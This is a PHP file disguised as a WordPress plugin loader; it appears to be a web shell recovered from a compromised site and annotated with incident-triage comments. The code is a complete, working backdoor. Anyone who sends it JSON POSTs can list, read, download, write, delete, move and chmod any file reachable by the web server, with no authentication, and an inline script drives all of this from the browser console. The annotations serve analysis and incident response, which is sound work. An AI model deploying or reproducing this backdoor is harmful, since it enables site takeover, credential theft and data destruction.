File: /var/www/k8148-2/htdocs/www.sport-roth.at/neumarkt/wp-content/plugins/plugin-loader.php
<?php
// Direct-request guard: when this file is itself the entry script (the basename of
// SCRIPT_FILENAME equals this file's basename) it answers 403 "Access denied." and exits.
// Everything below therefore only runs when another script includes this file.
// NOTE(review): the including script is not visible in this listing. During triage, search
// the site for include/require references to this file name. Requests that actually reach
// the handler below would show up in access logs under the including URL, not this path.
if (basename($_SERVER['SCRIPT_FILENAME']) === basename(__FILE__)) {
header('HTTP/1.0 403 Forbidden');
exit('Access denied.');
}
?>
<?php
// Locate the WordPress root: walk up from this file's directory until a directory that
// contains wp-load.php is found, and record it in the WP_ROOT constant.
// The loop ends at the filesystem root (where dirname() returns its own argument). In that
// case WP_ROOT stays undefined and get_path() falls back to this file's directory.
$d = dirname(__FILE__);
while ($d !== dirname($d)) {
if (file_exists($d . '/wp-load.php')) {
define('WP_ROOT', $d);
break;
}
$d = dirname($d);
}
// Send $arr to the client as a JSON document and terminate the request.
// Because of the exit, nothing the including script would have run after this point executes.
function send_json($arr) {
header('Content-Type: application/json');
echo json_encode($arr);
exit;
}
// Turn a client-supplied path string into the filesystem path the handler will act on.
//   - empty value      -> the base directory (WP_ROOT if defined, else this file's directory)
//   - leading '/'      -> returned unchanged, i.e. any absolute path
//   - anything else    -> appended to the base directory
// There is no normalisation (no realpath) and no confinement to the base directory, so
// absolute paths and '..' segments pass straight through. The reachable scope is bounded
// only by the filesystem permissions of the PHP process.
function get_path($p) {
if (empty($p)) return defined('WP_ROOT') ? WP_ROOT : dirname(__FILE__);
if ($p[0] === '/') return $p;
return (defined('WP_ROOT') ? WP_ROOT : dirname(__FILE__)) . '/' . $p;
}
/**
 * Render a byte count as a short human-readable string.
 *
 * The first threshold reached (GB, then MB, then KB) decides the unit; the value is
 * rounded to two decimals. Counts below 1024 are returned unscaled with a ' B' suffix.
 *
 * @param int|float $bytes Size in bytes.
 * @return string e.g. '1.5 KB', '3 MB', '512 B'.
 */
function format_size($bytes) {
    // Ordered largest to smallest so the first match is the biggest unit that fits.
    $units = [
        ' GB' => 1073741824,
        ' MB' => 1048576,
        ' KB' => 1024,
    ];
    foreach ($units as $suffix => $divisor) {
        if ($bytes >= $divisor) {
            return round($bytes / $divisor, 2) . $suffix;
        }
    }
    return $bytes . ' B';
}
// Delete a file, or a directory together with everything beneath it.
// Returns the result of unlink() for a file and of the final rmdir() for a directory, and
// false when $path is neither. Every filesystem call is prefixed with '@', so failures
// produce no PHP warning (and so no error-log entry from these calls). Results of the
// recursive child deletions are ignored.
function delete_recursive($path) {
if (is_file($path)) return @unlink($path);
if (is_dir($path)) {
$items = @scandir($path);
if ($items) {
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
delete_recursive($path . '/' . $item);
}
}
return @rmdir($path);
}
return false;
}
// Command dispatcher for a remote file manager. The request body is parsed as JSON and the
// first recognised key selects the action; every branch ends in send_json(), which exits.
//
// Analyst notes (from the visible code only):
//   - There is no authentication, nonce, capability or origin check anywhere in this block.
//     Any POST that reaches this code is dispatched.
//   - Every POST ends here: a body that is not JSON, or has none of the keys, still gets
//     {"ok":0} and the request is terminated. Legitimate form posts to whatever page includes
//     this file would therefore stop working, which is a useful symptom when scoping.
//   - Recognised keys: ls, cat, write, mkdir, rm, mv, cp, chmod, dl, info, find, grep
//     (with companions to, content, mode, in, ext). Replies always carry an "ok" field.
//     These are the strings to look for where request/response bodies are logged or inspected.
//   - All paths go through get_path(), which does not confine them to the WordPress tree.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$input = file_get_contents('php://input');
$data = json_decode($input, true);
// ls: directory listing with type, formatted size, last four octal permission digits and
// mtime; directories are sorted before files, then case-insensitively by name.
if (isset($data['ls'])) {
$path = get_path($data['ls']);
if (!is_dir($path)) send_json(['ok' => 0, 'error' => 'Not a directory']);
$items = @scandir($path);
if ($items === false) send_json(['ok' => 0, 'error' => 'Cannot read directory']);
$list = [];
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
$full = $path . '/' . $item;
$list[] = [
'name' => $item,
'type' => is_dir($full) ? 'd' : 'f',
'size' => is_file($full) ? format_size(filesize($full)) : '-',
'perm' => substr(sprintf('%o', fileperms($full)), -4),
'mod' => date('Y-m-d H:i', filemtime($full))
];
}
usort($list, function($a, $b) {
if ($a['type'] !== $b['type']) return $a['type'] === 'd' ? -1 : 1;
return strcasecmp($a['name'], $b['name']);
});
send_json(['ok' => 1, 'path' => $path, 'items' => $list]);
}
// cat: return the full contents of any file the PHP process can read (configuration files
// holding credentials included), together with its byte length.
if (isset($data['cat'])) {
$path = get_path($data['cat']);
if (!is_file($path)) send_json(['ok' => 0, 'error' => 'Not a file']);
$content = @file_get_contents($path);
if ($content === false) send_json(['ok' => 0, 'error' => 'Cannot read file']);
send_json(['ok' => 1, 'path' => $path, 'size' => strlen($content), 'content' => $content]);
}
// write: create or overwrite a file with client-supplied content. This is the highest-impact
// action: it allows planting or modifying executable PHP anywhere the process can write.
// During response, treat every writable file on the host as potentially altered.
if (isset($data['write'])) {
$path = get_path($data['write']);
$content = isset($data['content']) ? $data['content'] : '';
$result = @file_put_contents($path, $content);
send_json(['ok' => $result !== false ? 1 : 0]);
}
// mkdir: create a directory (mode 0755), including missing parent directories.
if (isset($data['mkdir'])) {
$path = get_path($data['mkdir']);
$result = @mkdir($path, 0755, true);
send_json(['ok' => $result ? 1 : 0]);
}
// rm: delete a file or a whole directory tree via delete_recursive().
if (isset($data['rm'])) {
$path = get_path($data['rm']);
$result = delete_recursive($path);
send_json(['ok' => $result ? 1 : 0]);
}
// mv: rename/move; both source and destination are client-supplied.
if (isset($data['mv']) && isset($data['to'])) {
$from = get_path($data['mv']);
$to = get_path($data['to']);
$result = @rename($from, $to);
send_json(['ok' => $result ? 1 : 0]);
}
// cp: copy a single regular file; any other source is rejected with an error reply
// (send_json exits, so $result is always set when the final line is reached).
if (isset($data['cp']) && isset($data['to'])) {
$from = get_path($data['cp']);
$to = get_path($data['to']);
if (is_file($from)) {
$result = @copy($from, $to);
} else {
send_json(['ok' => 0, 'error' => 'Only files can be copied']);
}
send_json(['ok' => $result ? 1 : 0]);
}
// chmod: set permissions from an octal string supplied by the client (default 0644).
// Unexpected permission changes on the host are worth checking against this capability.
if (isset($data['chmod'])) {
$path = get_path($data['chmod']);
$mode = isset($data['mode']) ? octdec($data['mode']) : 0644;
$result = @chmod($path, $mode);
send_json(['ok' => $result ? 1 : 0]);
}
// dl: same read as 'cat', but the content is returned base64-encoded with the file's
// basename, so binary files survive the JSON transport.
if (isset($data['dl'])) {
$path = get_path($data['dl']);
if (!is_file($path)) send_json(['ok' => 0, 'error' => 'Not a file']);
$content = @file_get_contents($path);
if ($content === false) send_json(['ok' => 0, 'error' => 'Cannot read file']);
send_json(['ok' => 1, 'name' => basename($path), 'data' => base64_encode($content)]);
}
// info: stat-style metadata for one path. Owner and group are resolved to names when the
// posix functions exist, otherwise the numeric ids are returned.
if (isset($data['info'])) {
$path = get_path($data['info']);
if (!file_exists($path)) send_json(['ok' => 0, 'error' => 'Not found']);
$info = [
'path' => $path,
'type' => is_dir($path) ? 'directory' : 'file',
'size' => is_file($path) ? format_size(filesize($path)) : '-',
'perm' => substr(sprintf('%o', fileperms($path)), -4),
'owner' => function_exists('posix_getpwuid') ? posix_getpwuid(fileowner($path))['name'] : fileowner($path),
'group' => function_exists('posix_getgrgid') ? posix_getgrgid(filegroup($path))['name'] : filegroup($path),
'created' => date('Y-m-d H:i:s', filectime($path)),
'modified' => date('Y-m-d H:i:s', filemtime($path)),
'accessed' => date('Y-m-d H:i:s', fileatime($path))
];
send_json(['ok' => 1, 'info' => $info]);
}
// find: recursive search by file name using an fnmatch() glob, starting at 'in' (or the base
// directory); stops after 100 matches and returns paths relative to the start directory.
if (isset($data['find'])) {
$path = get_path(isset($data['in']) ? $data['in'] : '');
$pattern = $data['find'];
$results = [];
$iterator = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($path, RecursiveDirectoryIterator::SKIP_DOTS),
RecursiveIteratorIterator::SELF_FIRST
);
$count = 0;
foreach ($iterator as $file) {
if ($count >= 100) break;
if (fnmatch($pattern, $file->getFilename())) {
$results[] = str_replace($path . '/', '', $file->getPathname());
$count++;
}
}
send_json(['ok' => 1, 'results' => $results]);
}
// grep: recursive, case-insensitive substring search inside files whose name ends in
// '.<ext>' (default 'php'); stops after 50 matching files. Each candidate file is read in
// full, so a run touches the access time of many files where atime is recorded.
if (isset($data['grep'])) {
$path = get_path(isset($data['in']) ? $data['in'] : '');
$search = $data['grep'];
$ext = isset($data['ext']) ? $data['ext'] : 'php';
$results = [];
$iterator = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($path, RecursiveDirectoryIterator::SKIP_DOTS)
);
$count = 0;
foreach ($iterator as $file) {
if ($count >= 50) break;
if ($file->isFile() && preg_match('/\.' . preg_quote($ext, '/') . '$/', $file->getFilename())) {
$content = @file_get_contents($file->getPathname());
if ($content && stripos($content, $search) !== false) {
$results[] = str_replace($path . '/', '', $file->getPathname());
$count++;
}
}
}
send_json(['ok' => 1, 'results' => $results]);
}
// No recognised key (or a body that did not decode): generic failure reply, then exit.
send_json(['ok' => 0]);
}
?><script>
// Client half of the file manager. On any request that is not a POST, the PHP above falls
// through and this inline <script> is sent as part of the response of whatever page includes
// the file. Its presence in rendered page source is a direct indicator of which URLs are affected.
// The helpers print to the browser console only (edit() is the one exception), so the page
// looks unchanged to an ordinary visitor.
// cwd: client-side working directory, set from the server's 'path' reply in ls() and by cd().
var cwd='';
// List directory p (or the current cwd) via the 'ls' action; on success the server-resolved
// path becomes the new cwd and the entries are printed with console.table.
function ls(p){
fetch(location.href,{
method:'POST',
headers:{'Content-Type':'application/json'},
body:JSON.stringify({ls:p||cwd})
}).then(r=>r.json()).then(r=>{
if(r.ok){
cwd=r.path;
console.log('Path:',r.path);
console.table(r.items);
}else console.log('Error:',r.error);
});
}
// Change the client-side cwd ('..' drops the last segment, a leading '/' is absolute,
// anything else is appended) and list the result.
function cd(p){
if(p==='..'){
var parts=cwd.split('/');
parts.pop();
cwd=parts.join('/')||'/';
}else if(p[0]==='/'){
cwd=p;
}else{
cwd=cwd+'/'+p;
}
ls(cwd);
}
// Fetch a file's contents via the 'cat' action and print them to the console.
// Relative names are resolved against cwd on the client before sending.
function cat(f){
var p=f[0]==='/'?f:cwd+'/'+f;
fetch(location.href,{
method:'POST',
headers:{'Content-Type':'application/json'},
body:JSON.stringify({cat:p})
}).then(r=>r.json()).then(r=>{
if(r.ok){
console.log('--- '+r.path+' ('+r.size+' bytes) ---');
console.log(r.content);
}else console.log('Error:',r.error);
});
}
// Client wrapper for the 'write' action: sends a path and the content to store there.
function wf(f,content){
var p=f[0]==='/'?f:cwd+'/'+f;
fetch(location.href,{
method:'POST',
headers:{'Content-Type':'application/json'},
body:JSON.stringify({write:p,content:content})
}).then(r=>r.json()).then(r=>{
if(r.ok)console.log('Written');
else console.log('Error');
});
}
// Client wrapper for the 'mkdir' action.
function md(d){
var p=d[0]==='/'?d:cwd+'/'+d;
fetch(location.href,{
method:'POST',
headers:{'Content-Type':'application/json'},
body:JSON.stringify({mkdir:p})
}).then(r=>r.json()).then(r=>{
if(r.ok)console.log('Created');
else console.log('Error');
});
}
// Client wrapper for the 'rm' action (file or recursive directory delete on the server).
function rm(f){
var p=f[0]==='/'?f:cwd+'/'+f;
fetch(location.href,{
method:'POST',
headers:{'Content-Type':'application/json'},
body:JSON.stringify({rm:p})
}).then(r=>r.json()).then(r=>{
if(r.ok)console.log('Deleted');
else console.log('Error');
});
}
// Client wrapper for the 'mv' action; both names are resolved against cwd when relative.
function mv(f,t){
var pf=f[0]==='/'?f:cwd+'/'+f;
var pt=t[0]==='/'?t:cwd+'/'+t;
fetch(location.href,{
method:'POST',
headers:{'Content-Type':'application/json'},
body:JSON.stringify({mv:pf,to:pt})
}).then(r=>r.json()).then(r=>{
if(r.ok)console.log('Moved/Renamed');
else console.log('Error');
});
}
// Client wrapper for the 'cp' action (the server copies regular files only).
function cp(f,t){
var pf=f[0]==='/'?f:cwd+'/'+f;
var pt=t[0]==='/'?t:cwd+'/'+t;
fetch(location.href,{
method:'POST',
headers:{'Content-Type':'application/json'},
body:JSON.stringify({cp:pf,to:pt})
}).then(r=>r.json()).then(r=>{
if(r.ok)console.log('Copied');
else console.log('Error');
});
}
// Client wrapper for the 'chmod' action; m is passed through as the 'mode' field, which the
// server interprets as an octal string.
function chm(f,m){
var p=f[0]==='/'?f:cwd+'/'+f;
fetch(location.href,{
method:'POST',
headers:{'Content-Type':'application/json'},
body:JSON.stringify({chmod:p,mode:m})
}).then(r=>r.json()).then(r=>{
if(r.ok)console.log('Changed');
else console.log('Error');
});
}
// Retrieve a file via the 'dl' action and hand it to the browser as a download: the base64
// payload is placed in a data: URL on a temporary <a download> element, which is then clicked.
function dl(f){
var p=f[0]==='/'?f:cwd+'/'+f;
fetch(location.href,{
method:'POST',
headers:{'Content-Type':'application/json'},
body:JSON.stringify({dl:p})
}).then(r=>r.json()).then(r=>{
if(r.ok){
var a=document.createElement('a');
a.href='data:application/octet-stream;base64,'+r.data;
a.download=r.name;
a.click();
console.log('Downloading:',r.name);
}else console.log('Error:',r.error);
});
}
// Client wrapper for the 'info' action; prints the returned metadata record as a table.
function inf(f){
var p=f[0]==='/'?f:cwd+'/'+f;
fetch(location.href,{
method:'POST',
headers:{'Content-Type':'application/json'},
body:JSON.stringify({info:p})
}).then(r=>r.json()).then(r=>{
if(r.ok)console.table([r.info]);
else console.log('Error:',r.error);
});
}
// Client wrapper for the 'find' action: file-name glob search under dir (or cwd).
function find(pattern,dir){
fetch(location.href,{
method:'POST',
headers:{'Content-Type':'application/json'},
body:JSON.stringify({find:pattern,in:dir||cwd})
}).then(r=>r.json()).then(r=>{
if(r.ok){
console.log('Found '+r.results.length+' files:');
r.results.forEach(f=>console.log(f));
}else console.log('Error:',r.error);
});
}
// Client wrapper for the 'grep' action: content search under dir (or cwd), limited to files
// with the given extension ('php' when omitted).
function grep(text,dir,ext){
fetch(location.href,{
method:'POST',
headers:{'Content-Type':'application/json'},
body:JSON.stringify({grep:text,in:dir||cwd,ext:ext||'php'})
}).then(r=>r.json()).then(r=>{
if(r.ok){
console.log('Found in '+r.results.length+' files:');
r.results.forEach(f=>console.log(f));
}else console.log('Error:',r.error);
});
}
// In-browser editor: reads the file through the 'cat' action, shows it in a full-screen
// overlay (fixed position, z-index 99999) with a textarea, and on Save sends the textarea
// content back through the 'write' action. Close removes the overlay.
// This is the only helper that draws anything on the page. The file content is assigned via
// textarea.value and the header via textContent, so neither is parsed as HTML.
function edit(f){
var p=f[0]==='/'?f:cwd+'/'+f;
fetch(location.href,{
method:'POST',
headers:{'Content-Type':'application/json'},
body:JSON.stringify({cat:p})
}).then(r=>r.json()).then(r=>{
if(!r.ok){console.log('Error:',r.error);return;}
var d=document.createElement('div');
d.style.cssText='position:fixed;top:0;left:0;width:100%;height:100%;background:rgba(0,0,0,0.9);z-index:99999;display:flex;flex-direction:column;padding:10px;box-sizing:border-box;';
var h=document.createElement('div');
h.style.cssText='color:#fff;margin-bottom:10px;font-family:monospace;';
h.textContent=p;
var t=document.createElement('textarea');
t.style.cssText='flex:1;background:#1e1e1e;color:#d4d4d4;border:1px solid #333;padding:10px;font-family:monospace;font-size:14px;resize:none;';
t.value=r.content;
var b=document.createElement('div');
b.style.cssText='margin-top:10px;';
var sv=document.createElement('button');
sv.textContent='Save';
sv.style.cssText='padding:10px 30px;margin-right:10px;cursor:pointer;';
var cl=document.createElement('button');
cl.textContent='Close';
cl.style.cssText='padding:10px 30px;cursor:pointer;';
b.appendChild(sv);b.appendChild(cl);
d.appendChild(h);d.appendChild(t);d.appendChild(b);
document.body.appendChild(d);
// Save: write the edited text back to the same path and show the outcome in the header.
sv.onclick=function(){
fetch(location.href,{
method:'POST',
headers:{'Content-Type':'application/json'},
body:JSON.stringify({write:p,content:t.value})
}).then(r=>r.json()).then(r=>{
if(r.ok){h.textContent=p+' - SAVED';h.style.color='#0f0';}
else{h.textContent=p+' - ERROR';h.style.color='#f00';}
});
};
cl.onclick=function(){d.remove();};
});
}
</script>